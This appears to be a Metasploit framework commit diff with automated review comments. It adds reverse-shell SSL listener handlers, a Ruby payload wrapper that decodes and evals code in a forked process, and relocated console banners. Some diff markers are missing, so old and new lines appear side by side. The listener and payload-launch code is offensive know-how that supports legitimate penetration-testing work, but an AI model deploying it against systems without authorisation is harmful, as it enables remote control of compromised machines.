if (@sock_out.has_read_data?(0.50))
buf = @sock_out.get_once
break if buf.nil?
rsock.put(buf)
end
end
rescue ::Exception => e
ilog("ReverseTcpDoubleSSL monitor thread raised #{e.class}: #{e}")
end
# Clean up the sockets...
begin
@sock_inp.close
@sock_out.close
rescue ::Exception
end
}
end
def write(buf, opts={})
@sock_inp.write(buf, opts)
end
def read(length=0, opts={})
@sock_out.read(length, opts)
end
#
# Closes the stream abstraction and kills the monitor thread.
#
def close
@monitor_thread.kill if (@monitor_thread)
@monitor_thread = nil
cleanup_abstraction
end
end
end
end
end
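Review bot: `'Comm' => comm` in `setup_handler` references `comm`, which is not defined anywhere in this file (the ReverseTcpSsl handler added in this same commit derives it from `datastore['ReverseListenerComm']`); unless an included module supplies it, `setup_handler` raises NameError before the listener is created. Three smaller points: `'LocalHost'` is commented out, so the SSL listener binds every interface and ignores both LHOST and ReverseListenerBindAddress, which should at least be documented; `detect_input_output` rescues `::Exception` and then returns nil, so the session thread is spawned with `sock_inp` and `sock_out` both nil and only fails later inside `TcpReverseDoubleSSLSessionChannel#initialize` on `getpeername`, better to re-raise or return early before `pending_connections` is incremented; and the doc comments carry typos ("ads the options", "Accept two client connection", "Client's are").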

View File

@ -0,0 +1,124 @@
require 'rex/socket'
require 'thread'
require 'msf/core/handler/reverse_tcp'
module Msf
module Handler
###
#
# This module implements the reverse TCP handler. This means
# that it listens on a port waiting for a connection until
# either one is established or it is told to abort.
#
# This handler depends on having a local host and port to
# listen on.
#
###
module ReverseTcpSsl
include Msf::Handler::ReverseTcp
#
# Returns the string representation of the handler type, in this case
# 'reverse_tcp_ssl'.
#
def self.handler_type
return "reverse_tcp_ssl"
end
#
# Returns the connection-described general handler type, in this case
# 'reverse'.
#
def self.general_handler_type
"reverse"
end
#
# Initializes the reverse TCP SSL handler and adds the certificate option.
#
def initialize(info = {})
super
register_advanced_options(
[
OptPath.new('SSLCert', [ false, 'Path to a custom SSL certificate (default is randomly generated)'])
], Msf::Handler::ReverseTcpSsl)
end
#
# Starts the listener but does not actually attempt
# to accept a connection. Throws socket exceptions
# if it fails to start the listener.
#
def setup_handler
if datastore['Proxies']
raise RuntimeError, 'TCP connect-back payloads cannot be used with Proxies'
end
ex = false
# Switch to IPv6 ANY address if the LHOST is also IPv6
addr = Rex::Socket.resolv_nbo(datastore['LHOST'])
# First attempt to bind LHOST. If that fails, the user probably has
# something else listening on that interface. Try again with ANY_ADDR.
any = (addr.length == 4) ? "0.0.0.0" : "::0"
addrs = [ Rex::Socket.addr_ntoa(addr), any ]
comm = datastore['ReverseListenerComm']
if comm.to_s == "local"
comm = ::Rex::Socket::Comm::Local
else
comm = nil
end
if not datastore['ReverseListenerBindAddress'].to_s.empty?
# Only try to bind to this specific interface
addrs = [ datastore['ReverseListenerBindAddress'] ]
# Pick the right "any" address if either wildcard is used
addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0")
end
addrs.each { |ip|
begin
comm.extend(Rex::Socket::SslTcp)
self.listener_sock = Rex::Socket::SslTcpServer.create(
'LocalHost' => datastore['LHOST'],
'LocalPort' => datastore['LPORT'].to_i,
'Comm' => comm,
'SSLCert' => datastore['SSLCert'],
'Context' =>
{
'Msf' => framework,
'MsfPayload' => self,
'MsfExploit' => assoc_exploit
})
ex = false
comm_used = comm || Rex::Socket::SwitchBoard.best_comm( ip )
comm_used = Rex::Socket::Comm::Local if comm_used == nil
if( comm_used.respond_to?( :type ) and comm_used.respond_to?( :sid ) )
via = "via the #{comm_used.type} on session #{comm_used.sid}"
else
via = ""
end
print_status("Started reverse SSL handler on #{ip}:#{datastore['LPORT']} #{via}")
break
rescue
ex = $!
print_error("Handler failed to bind to #{ip}:#{datastore['LPORT']}")
end
}
raise ex if (ex)
end
end
end
end
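Review bot: inside `addrs.each { |ip| ... }` the listener is created with `'LocalHost' => datastore['LHOST']` rather than `ip`, so the documented fallback to the ANY address never happens: both iterations try to bind LHOST, and the "Started reverse SSL handler on #{ip}" message can report an address the socket is not bound to. Use `'LocalHost' => ip`. Also: `addrs == "::0"` compares the array to a string and is always false, it should be `addrs[0] == "::0"`; `comm.extend(Rex::Socket::SslTcp)` is applied to `nil` in the default case and to the `Rex::Socket::Comm::Local` module otherwise, neither of which is a socket, so the line should go (`SslTcpServer.create` already handles the TLS side); and unlike the double handler in this commit, the Proxies check here does not honour ReverseAllowProxy.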

View File

@ -479,4 +479,20 @@ class Msf::Module::Platform
Rank = 100
Alias = "php"
end
#
# JavaScript
#
class JavaScript < Msf::Module::Platform
Rank = 100
Alias = "js"
end
#
# Python
#
class Python < Msf::Module::Platform
Rank = 100
Alias = "python"
end
end

View File

@ -35,15 +35,14 @@ module Msf::Payload::Java
end
#
# Used by stagers to create a jar file as a Rex::Zip::Jar. Stagers define
# a list of class files in @class_files which are pulled from
# Msf::Config.data_directory. The configuration file is created by the
# payload's #config method.
#
# +opts+ can include:
# +:main_class+:: the name of the Main-Class attribute in the manifest.
# Defaults to "metasploit.Payload"
# Used by stagers to create a jar file as a {Rex::Zip::Jar}. Stagers
# define a list of class files in @class_files which are pulled from
# {Msf::Config.data_directory}. The configuration file is created by
# the payload's #config method.
#
# @option opts :main_class [String] the name of the Main-Class
# attribute in the manifest. Defaults to "metasploit.Payload"
# @return [Rex::Zip::Jar]
def generate_jar(opts={})
raise if not respond_to? :config
# Allow changing the jar's Main Class in the manifest so wrappers
@ -63,12 +62,12 @@ module Msf::Payload::Java
end
#
# Like #generate_jar, this method is used by stagers to create a war file
# Like {#generate_jar}, this method is used by stagers to create a war file
# as a Rex::Zip::Jar object.
#
# +opts+ can include:
# +:app_name+:: the name of the \<servlet-name> attribute in the web.xml.
# Defaults to "NAME"
# @param opts [Hash]
# @option :app_name [String] Name of the \<servlet-name> attribute in the
# web.xml. Defaults to random
#
def generate_war(opts={})
raise if not respond_to? :config
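Review bot: `@option :app_name [String]` is missing the hash parameter name; YARD's syntax is `@option opts :app_name [String]`, matching the `@option opts :main_class` form used in `generate_jar` above. "Defaults to random" should also say what is randomised (the servlet name), and the `# as a Rex::Zip::Jar object.` line could use the same `{Rex::Zip::Jar}` link form as the sentence before it.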

View File

@ -0,0 +1,39 @@
# -*- coding: binary -*-
require 'msf/core'
module Msf::Payload::Ruby
def initialize(info = {})
super(info)
register_advanced_options(
[
# Since space restrictions aren't really a problem, default this to
# true.
Msf::OptBool.new('PrependFork', [ false, "Start the payload in its own process via fork or popen", "true" ])
]
)
end
def prepends(buf)
if datastore['PrependFork']
buf = %Q^
code = %(#{ Rex::Text.encode_base64(buf) }).unpack(%(m0)).first
if RUBY_PLATFORM =~ /mswin|mingw|win32/
inp = IO.popen(%(ruby), %(wb)) rescue nil
if inp
inp.write(code)
inp.close
end
else
if ! Process.fork()
eval(code) rescue nil
end
end
^.strip.split(/\n/).map{|line| line.strip}.join("\n")
end
buf
end
end
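Review bot: `Msf::OptBool.new('PrependFork', [ false, "...", "true" ])` passes the default as the string `"true"` rather than the boolean `true`; OptBool normalises it, but the other options in this commit use literal booleans and the string form reads like a mistake. In the generated prelude, `Process.fork()` is only guarded by the Windows platform check, so on an interpreter without fork (JRuby) it raises NotImplementedError and the payload body never runs; `Process.respond_to?(:fork)` is the safer test, with the `IO.popen` path as the fallback. `eval(code) rescue nil` also swallows every error from the payload body, which makes failures invisible in both parent and child; consider at least writing the exception to stderr in the child.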

View File

@ -274,7 +274,7 @@ module Msf::Post::File
end
#
# Read a local file +local+ and write it as +remote+ on the remote file
# Read a local file +local+ and write it as +remote+ on the remote file
# system
#
def upload_file(remote, local)
@ -304,7 +304,7 @@ module Msf::Post::File
#
def rename_file(new_file, old_file)
#TODO: this is not ideal as the file contents are sent to meterp server and back to the client
write_file(new_file, read_file(old_file))
write_file(new_file, read_file(old_file))
rm_f(old_file)
end
alias :move_file :rename_file
@ -315,7 +315,7 @@ protected
# Meterpreter-specific file read. Returns contents of remote file
# +file_name+ as a String or nil if there was an error
#
# You should never call this method directly. Instead, call #read_file
# You should never call this method directly. Instead, call {#read_file}
# which will call this if it is appropriate for the given session.
#
def _read_file_meterpreter(file_name)

View File

@ -10,301 +10,52 @@ module Ui
module Banner
Logos =
[
%Q{
%whiCall trans opt: received. 2-19-98 13:24:18 REC:Loc
Trace program: running
wake up, Neo...
%bldthe matrix has you%clr
follow the white rabbit.
knock, knock, Neo.
(`. ,-,
` `. ,;' /
`. ,'/ .'
`. X /.'
.-;--''--.._` ` (
.' / `
, ` ' Q '
, , `._ \\
,.| ' `-.;_'
: . ` ; ` ` --,.._;
' ` , ) .'
`._ , ' /_
; ,''-,;' ``-
``-..__``--`
%clr},
%Q{%whi
_---------.
.' ####### ;."
.---,. ;@ @@`; .---,..
." @@@@@'.,'@@ @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
`.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
"--'.@@@ -.@ @ ,'- .'--"
".@' ; @ @ `. ;'
|@@@@ @@@ @ .
' @@@ @@ @@ ,
`.@@@@ @@ .
',@@ @ ; _____________
( 3 C ) /|___ / Metasploit! \\
;@'. __*__,." \\|--- \\_____________/
'(.,...."/
%clr},
'
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% % %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%% %% %%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%%
%%%% %% %% % %% %% %%%%% % %%%% %% %%%%%% %%
%%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%% %%%%%
%%%% %%%%%% %% %%%%%% %%%% %%% %%%% %% %% %%% %%% %% %% %%%%%
%%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
',
'
_ _
/ \ /\ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_
|/ |____/ \___\/ /\ \\\\___/ \/ \__| |_\ \___\
',
%Q{
%whiIIIIII %reddTb.dTb%clr _.---._
%whi II %red4' v 'B%clr .'"".'/|\`.""'.
%whi II %red6. .P%clr : .' / | \ `. :
%whi II %red'T;. .;P'%clr '.' / | \ `.'
%whi II %red'T; ;P'%clr `. / | \ .'
%whiIIIIII %red'YvP'%clr `-.__|__.-'
I love shells --egypt
},
'
, ,
/ \
((__---,,,---__))
(_) O O (_)_________
\ _ / |\
o_o \ M S F | \
\ _____ | *
||| WW|||
||| |||
',
'
# cowsay++
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *
',
'%clr
______________________________________________________________________________
| |
| %bld3Kom SuperHack II Logon%clr |
|______________________________________________________________________________|
| |
| |
| |
| User Name: [ %redsecurity%clr ] |
| |
| Password: [ ] |
| |
| |
| |
| %bld[ OK ]%clr |
|______________________________________________________________________________|
| |
|______________________________________________________________________________|
%clr
',
'%clr
______________________________________________________________________________
| |
| %bld%grnMETASPLOIT CYBER MISSILE COMMAND V4%clr |
|______________________________________________________________________________|
%yel\%clr %yel/%clr %yel/%clr
%yel\%clr . %yel/%clr %yel/%clr x
%yel\%clr %yel/%clr %yel/%clr
%yel\%clr %yel/%clr + %yel/%clr
%yel\%clr + %yel/%clr %yel/%clr
* %yel/%clr %yel/%clr
%yel/%clr . %yel/%clr
X %yel/%clr %yel/%clr X
%yel/%clr %red###%clr
%yel/%clr %red# %bld%%clr%red #%clr
%yel/%clr %red###%clr
. %yel/%clr
. %yel/%clr . %red*%clr .
%yel/%clr
*
+ %red*%clr
%bld^%clr
#### __ __ __ ####### __ __ __ ####
#### %yel/%clr %yel\%clr %yel/%clr %yel\%clr %yel/%clr %yel\%clr ########### %yel/%clr %yel\%clr %yel/%clr %yel\%clr %yel/%clr %yel\%clr ####
################################################################################
################################################################################
# %bldWAVE 4%clr ######## %bldSCORE 31337%clr ################################## %bldHIGH FFFFFFFF%clr #
################################################################################
%clr
',
'
%clr%whi
Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f
EFLAGS: 00010046
eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001
esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60
ds: 0018 es: 0018 ss: 0018
Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)
%bld
Stack: 90909090990909090990909090
90909090990909090990909090
90909090.90909090.90909090
90909090.90909090.90909090
90909090.90909090.09090900
90909090.90909090.09090900
..........................
cccccccccccccccccccccccccc
cccccccccccccccccccccccccc
ccccccccc.................
cccccccccccccccccccccccccc
cccccccccccccccccccccccccc
.................ccccccccc
cccccccccccccccccccccccccc
cccccccccccccccccccccccccc
..........................
ffffffffffffffffffffffffff
ffffffff..................
ffffffffffffffffffffffffff
ffffffff..................
ffffffff..................
ffffffff..................
%clr
%yelCode: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00%clr
Aiee, Killing Interrupt handler
%redKernel panic: Attempted to kill the idle task!
In swapper task - not syncing
%clr
',
'
%clr
%bluMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM%clr
%bluMMMMMMMMMMM MMMMMMMMMM%clr
%bluMMMN$ vMMMM%clr
%bluMMMNl%clr %bldMMMMM MMMMM%clr %bluJMMMM%clr
%bluMMMNl%clr %bldMMMMMMMN NMMMMMMM%clr %bluJMMMM%clr
%bluMMMNl%clr %bldMMMMMMMMMNmmmNMMMMMMMMM%clr %bluJMMMM%clr
%bluMMMNI%clr %bldMMMMMMMMMMMMMMMMMMMMMMM%clr %blujMMMM%clr
%bluMMMNI%clr %bldMMMMMMMMMMMMMMMMMMMMMMM%clr %blujMMMM%clr
%bluMMMNI%clr %bldMMMMM MMMMMMM MMMMM%clr %blujMMMM%clr
%bluMMMNI%clr %bldMMMMM MMMMMMM MMMMM%clr %blujMMMM%clr
%bluMMMNI%clr %bldMMMNM MMMMMMM MMMMM%clr %blujMMMM%clr
%bluMMMNI%clr %bldWMMMM MMMMMMM MMMM#%clr %bluJMMMM%clr
%bluMMMMR%clr %bld?MMNM MMMMM%clr %blu.dMMMM%clr
%bluMMMMNm%clr %bld`?MMM MMMM`%clr %bludMMMMM%clr
%bluMMMMMMN%clr %bld?MM MM?%clr %bluNMMMMMN%clr
%bluMMMMMMMMNe%clr %bluJMMMMMNMMM%clr
%bluMMMMMMMMMMNm,%clr %blueMMMMMNMMNMM%clr
%bluMMMMNNMNMMMMMNx%clr %bluMMMMMMNMMNMMNM%clr
%bluMMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM%clr
%clr
',
'
%clr ######## #
################# #
###################### #
######################### #
############################
##############################
###############################
###############################
##############################
# ######## #
%red##%clr %red###%clr #### ##
### ###
#### ###
#### ########## ####
####################### ####
#################### ####
################## ####
############ ##
######## ###
######### #####
############ ######
######## #########
##### ########
### #########
###### ############
#######################
# # ### # # ##
########################
## ## ## ##
%clr
',
%Q{
%whi+-------------------------------------------------------+
%whi| METASPLOIT by Rapid7 |
%whi+---------------------------+---------------------------+
%whi| %blu__________________ %whi| |
%whi| %yel==c%blu(______(%yelo%blu(______(_%yel() %whi| %grn|""""""""""""|======\[%red*** %whi|
%whi| %blu)%yel=%blu\\\ %whi| %grn| %whiEXPLOIT %grn\\ %whi|
%whi| %blu// \\\\ %whi| %grn|_____________\\_______ %whi|
%whi| %blu// \\\\ %whi| %grn|==\[%whimsf >%grn\]============\\ %whi|
%whi| %blu// \\\\ %whi| %grn|______________________\\ %whi|
%whi| %blu// %whiRECON %blu\\\\ %whi| %grn\\(@)(@)(@)(@)(@)(@)(@)/ %whi|
%whi| %blu// \\\\ %whi| %grn********************* %whi|
%whi+---------------------------+---------------------------+
%whi| o O o | %yel\\'\\/\\/\\/'/ %whi|
%whi| o O | %yel)%whi======%yel( %whi|
%whi| o | %yel.' %whiLOOT %yel'. %whi|
%whi| %red|^^^^^^^^^^^^^^\|l%red___ %whi| %yel/ %grn_||__ %yel\\ %whi|
%whi| %red| %whiPAYLOAD %red|%whi""\\%red___, %whi| %yel/ %grn(_||_ %yel\\ %whi|
%whi| %red|________________|__|)__| %whi| %yel| %grn__||_) %yel| %whi|
%whi| %red|(@)(@)"""**|(@)(@)**|(@) %whi| %yel" %grn|| %yel" %whi|
%whi| %yel= = = = = = = = = = = = %whi| %yel'--------------' %whi|
%whi+---------------------------+---------------------------+%clr
%clr
},]
%w{
wake-up-neo.txt
cow-head.txt
r7-metasploit.txt
figlet.txt
i-heart-shells.txt
branded-longhorn.txt
cowsay.txt
3kom-superhack.txt
missile-command.txt
null-pointer-deref.txt
metasploit-shield.txt
ninja.txt
workflow.txt
}
#
# Returns a random metasploit logo.
#
def self.readfile(fname)
base = File.expand_path(File.dirname(__FILE__))
pathname = File.join(base, "logos", fname)
fdata = "<< Missing banner: #{fname} >>"
begin
raise ArgumentError unless File.readable?(pathname)
raise ArgumentError unless File.stat(pathname).size < 4096
fdata = File.open(pathname) {|f| f.read f.stat.size}
rescue SystemCallError, ArgumentError
nil
end
return fdata
end
def self.to_s
if ENV['GOCOW']
case rand(2)
case rand(3)
when 0
Logos[1]
self.readfile Logos[1]
when 1
Logos[5]
self.readfile Logos[5]
when 2
self.readfile Logos[6]
end
else
Logos[rand(Logos.length)]
self.readfile Logos[rand(Logos.length)]
end
end
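Review bot: the `# Returns a random metasploit logo.` comment now sits above `readfile`, which reads one named file, while `to_s` (the method it describes) is left undocumented; move it down. In `readfile`, both the readability check and the 4096-byte cap fall through silently to the `<< Missing banner: ... >>` string, so a logo that grows a byte past the limit, or a packaging problem that leaves `logos/` unreadable, shows up only as a placeholder in the banner rather than in the log; an `elog` in the `rescue SystemCallError, ArgumentError` branch would make that diagnosable. The `case rand(3)` mapping (indexes 1, 5 and 6 are cow-head, branded-longhorn and cowsay) is consistent with the `%w{}` list, but a comment saying GOCOW picks the cow logos would save the next reader the cross-check.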

View File

@ -205,6 +205,7 @@ class Db
mode = :search
delete_count = 0
rhosts = []
host_ranges = []
search_term = nil
@ -241,7 +242,6 @@ class Db
output = args.shift
when '-R','--rhosts'
set_rhosts = true
rhosts = []
when '-S', '--search'
search_term = /#{args.shift}/nmi
@ -280,11 +280,6 @@ class Db
range.each do |address|
host = framework.db.find_or_create_host(:host => address)
print_status("Time: #{host.created_at} Host: host=#{host.address}")
if set_rhosts
# only unique addresses
addr = (host.scope ? host.address + '%' + host.scope : host.address )
rhosts << addr unless rhosts.include?(addr)
end
end
end
return
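Review bot: removing the `if set_rhosts ... rhosts << addr` block from the `-a` branch is harmless today only because the branch `return`s before `set_rhosts_from_addrs` is ever reached, so `-R` never had any effect together with `-a`. If that is the intended behaviour, fine; if `hosts -a ... -R` was meant to put the added hosts into RHOSTS, this branch needs a `set_rhosts_from_addrs(rhosts.uniq) if set_rhosts` before the `return` rather than just dropping the accumulation.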
@ -323,7 +318,7 @@ class Db
tbl << columns
if set_rhosts
addr = (host.scope ? host.address + '%' + host.scope : host.address )
rhosts << addr unless rhosts.include?(addr)
rhosts << addr
end
if mode == :delete
host.destroy
@ -344,9 +339,11 @@ class Db
# Finally, handle the case where the user wants the resulting list
# of hosts to go into RHOSTS.
set_rhosts_from_addrs(rhosts) if set_rhosts
set_rhosts_from_addrs(rhosts.uniq) if set_rhosts
print_status("Deleted #{delete_count} hosts") if delete_count > 0
}
##
##
end
def cmd_services_help
@ -366,10 +363,11 @@ class Db
default_columns = ::Mdm::Service.column_names.sort
default_columns.delete_if {|v| (v[-2,2] == "id")}
host_ranges = []
port_ranges = []
host_ranges = []
port_ranges = []
rhosts = []
delete_count = 0
search_term = nil
search_term = nil
# option parsing
while (arg = args.shift)
@ -420,7 +418,6 @@ class Db
output_file = ::File.expand_path(output_file)
when '-R','--rhosts'
set_rhosts = true
rhosts = []
when '-S', '--search'
search_term = /#{args.shift}/nmi
@ -508,7 +505,7 @@ class Db
tbl << columns
if set_rhosts
addr = (host.scope ? host.address + '%' + host.scope : host.address )
rhosts << addr unless rhosts.include?(addr)
rhosts << addr
end
if (mode == :delete)
@ -529,7 +526,7 @@ class Db
# Finally, handle the case where the user wants the resulting list
# of hosts to go into RHOSTS.
set_rhosts_from_addrs(rhosts) if set_rhosts
set_rhosts_from_addrs(rhosts.uniq) if set_rhosts
print_status("Deleted #{delete_count} services") if delete_count > 0
}
@ -680,6 +677,7 @@ class Db
host_ranges = []
port_ranges = []
rhosts = []
svcs = []
search_term = nil
@ -733,7 +731,6 @@ class Db
end
when "-R"
set_rhosts = true
rhosts = []
when '-S', '--search'
search_term = /#{args.shift}/nmi
when "-u","--user"
@ -828,7 +825,7 @@ class Db
end
if set_rhosts
addr = (cred.service.host.scope ? cred.service.host.address + '%' + cred.service.host.scope : cred.service.host.address )
rhosts << addr unless rhosts.include?(addr)
rhosts << addr
end
creds_returned += 1
end
@ -842,7 +839,7 @@ class Db
print_status("Wrote services to #{output_file}")
end
set_rhosts_from_addrs(rhosts) if set_rhosts
set_rhosts_from_addrs(rhosts.uniq) if set_rhosts
print_status "Found #{creds_returned} credential#{creds_returned == 1 ? "" : "s"}."
}
end
@ -873,6 +870,7 @@ class Db
set_rhosts = false
host_ranges = []
rhosts = []
search_term = nil
while (arg = args.shift)
@ -896,7 +894,6 @@ class Db
types = typelist.strip().split(",")
when '-R','--rhosts'
set_rhosts = true
rhosts = []
when '-S', '--search'
search_term = /#{args.shift}/nmi
when '-h','--help'
@ -954,7 +951,7 @@ class Db
msg << " host=#{note.host.address}"
if set_rhosts
addr = (host.scope ? host.address + '%' + host.scope : host.address )
rhosts << addr unless rhosts.include?(addr)
rhosts << addr
end
end
if (note.service)
@ -971,7 +968,7 @@ class Db
# Finally, handle the case where the user wants the resulting list
# of hosts to go into RHOSTS.
set_rhosts_from_addrs(rhosts) if set_rhosts
set_rhosts_from_addrs(rhosts.uniq) if set_rhosts
print_status("Deleted #{delete_count} note#{delete_count == 1 ? "" : "s"}") if delete_count > 0
}
@ -1476,7 +1473,7 @@ class Db
print_error("The database is not connected")
return
end
print_status("Purging and rebuilding the module cache in the background...")
framework.threads.spawn("ModuleCacheRebuild", true) do
framework.db.purge_all_module_details
@ -1707,4 +1704,3 @@ end
end
end
end

View File

@ -0,0 +1,19 @@
%clr
______________________________________________________________________________
| |
| %bld3Kom SuperHack II Logon%clr |
|______________________________________________________________________________|
| |
| |
| |
| User Name: [ %redsecurity%clr ] |
| |
| Password: [ ] |
| |
| |
| |
| %bld[ OK ]%clr |
|______________________________________________________________________________|
| |
| http://metasploit.pro |
|______________________________________________________________________________|%clr
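Review bot: this file is the 3Kom banner moved out of banner.rb, but it gains a `| http://metasploit.pro |` row (and a trailing `%clr` on the last line) that the inline version did not have; the metasploit-shield logo below picks up the same URL line. Fine if intended, but the commit message should say the banners are being changed, not only relocated, and the readfile size cap of 4096 bytes should be checked against the colour-escaped files rather than the plain ones.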

View File

@ -0,0 +1,9 @@
, ,
/ \
((__---,,,---__))
(_) O O (_)_________
\ _ / |\
o_o \ M S F | \
\ _____ | *
||| WW|||
||| |||

View File

@ -0,0 +1,16 @@
%whi
_---------.
.' ####### ;."
.---,. ;@ @@`; .---,..
." @@@@@'.,'@@ @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
`.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
"--'.@@@ -.@ @ ,'- .'--"
".@' ; @ @ `. ;'
|@@@@ @@@ @ .
' @@@ @@ @@ ,
`.@@@@ @@ .
',@@ @ ; _____________
( 3 C ) /|___ / Metasploit! \
;@'. __*__,." \|--- \_____________/
'(.,...."/%clr

View File

@ -0,0 +1,8 @@
# cowsay++
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *

View File

@ -0,0 +1,6 @@
_ _
/ \ /\ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_
|/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\

View File

@ -0,0 +1,8 @@
%whiIIIIII %reddTb.dTb%clr _.---._
%whi II %red4' v 'B%clr .'"".'/|\`.""'.
%whi II %red6. .P%clr : .' / | \ `. :
%whi II %red'T;. .;P'%clr '.' / | \ `.'
%whi II %red'T; ;P'%clr `. / | \ .'
%whiIIIIII %red'YvP'%clr `-.__|__.-'
I love shells --egypt

View File

@ -0,0 +1,21 @@
%clr
%bluMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM%clr
%bluMMMMMMMMMMM MMMMMMMMMM%clr
%bluMMMN$ vMMMM%clr
%bluMMMNl%clr %bldMMMMM MMMMM%clr %bluJMMMM%clr
%bluMMMNl%clr %bldMMMMMMMN NMMMMMMM%clr %bluJMMMM%clr
%bluMMMNl%clr %bldMMMMMMMMMNmmmNMMMMMMMMM%clr %bluJMMMM%clr
%bluMMMNI%clr %bldMMMMMMMMMMMMMMMMMMMMMMM%clr %blujMMMM%clr
%bluMMMNI%clr %bldMMMMMMMMMMMMMMMMMMMMMMM%clr %blujMMMM%clr
%bluMMMNI%clr %bldMMMMM MMMMMMM MMMMM%clr %blujMMMM%clr
%bluMMMNI%clr %bldMMMMM MMMMMMM MMMMM%clr %blujMMMM%clr
%bluMMMNI%clr %bldMMMNM MMMMMMM MMMMM%clr %blujMMMM%clr
%bluMMMNI%clr %bldWMMMM MMMMMMM MMMM#%clr %bluJMMMM%clr
%bluMMMMR%clr %bld?MMNM MMMMM%clr %blu.dMMMM%clr
%bluMMMMNm%clr %bld`?MMM MMMM`%clr %bludMMMMM%clr
%bluMMMMMMN%clr %bld?MM MM?%clr %bluNMMMMMN%clr
%bluMMMMMMMMNe%clr %bluJMMMMMNMMM%clr
%bluMMMMMMMMMMNm,%clr %blueMMMMMNMMNMM%clr
%bluMMMMNNMNMMMMMNx%clr %bluMMMMMMNMMNMMNM%clr
%bluMMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM%clr
%clr%bld http://metasploit.pro
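Review bot: the final line `%clr%bld http://metasploit.pro` opens bold and never closes it, so the bold attribute can leak into whatever the console prints after the banner; every other banner in this commit ends its last line with `%clr`, and this one should too.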

View File

@ -0,0 +1,30 @@
%clr
______________________________________________________________________________
| |
| %bld%grnMETASPLOIT CYBER MISSILE COMMAND V4%clr |
|______________________________________________________________________________|
%yel\%clr %yel/%clr %yel/%clr
%yel\%clr . %yel/%clr %yel/%clr x
%yel\%clr %yel/%clr %yel/%clr
%yel\%clr %yel/%clr + %yel/%clr
%yel\%clr + %yel/%clr %yel/%clr
* %yel/%clr %yel/%clr
%yel/%clr . %yel/%clr
X %yel/%clr %yel/%clr X
%yel/%clr %red###%clr
%yel/%clr %red# %bld%%clr%red #%clr
%yel/%clr %red###%clr
. %yel/%clr
. %yel/%clr . %red*%clr .
%yel/%clr
*
+ %red*%clr
%bld^%clr
#### __ __ __ ####### __ __ __ ####
#### %yel/%clr %yel\%clr %yel/%clr %yel\%clr %yel/%clr %yel\%clr ########### %yel/%clr %yel\%clr %yel/%clr %yel\%clr %yel/%clr %yel\%clr ####
################################################################################
################################################################################
# %bldWAVE 4%clr ######## %bldSCORE 31337%clr ################################## %bldHIGH FFFFFFFF%clr #
################################################################################
http://metasploit.pro%clr
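Review bot: in `%red# %bld%%clr%red #%clr` the `%%` sequence is ambiguous: depending on how the colour substitution tokenises it, `%bld%` could leave a stray `%` on screen or swallow the intended literal percent sign. Confirm how a literal `%` is escaped by the banner colour substitution and adjust this line so the missile glyph renders as intended.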

View File

@ -0,0 +1,30 @@
%clr ######## #
################# #
###################### #
######################### #
############################
##############################
###############################
###############################
##############################
# ######## #
%red##%clr %red###%clr #### ##
### ###
#### ###
#### ########## ####
####################### ####
#################### ####
################## ####
############ ##
######## ###
######### #####
############ ######
######## #########
##### ########
### #########
###### ############
#######################
# # ### # # ##
########################
## ## ## ##
http://metasploit.pro%clr

View File

@ -0,0 +1,37 @@
%clr%whi
Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f
EFLAGS: 00010046
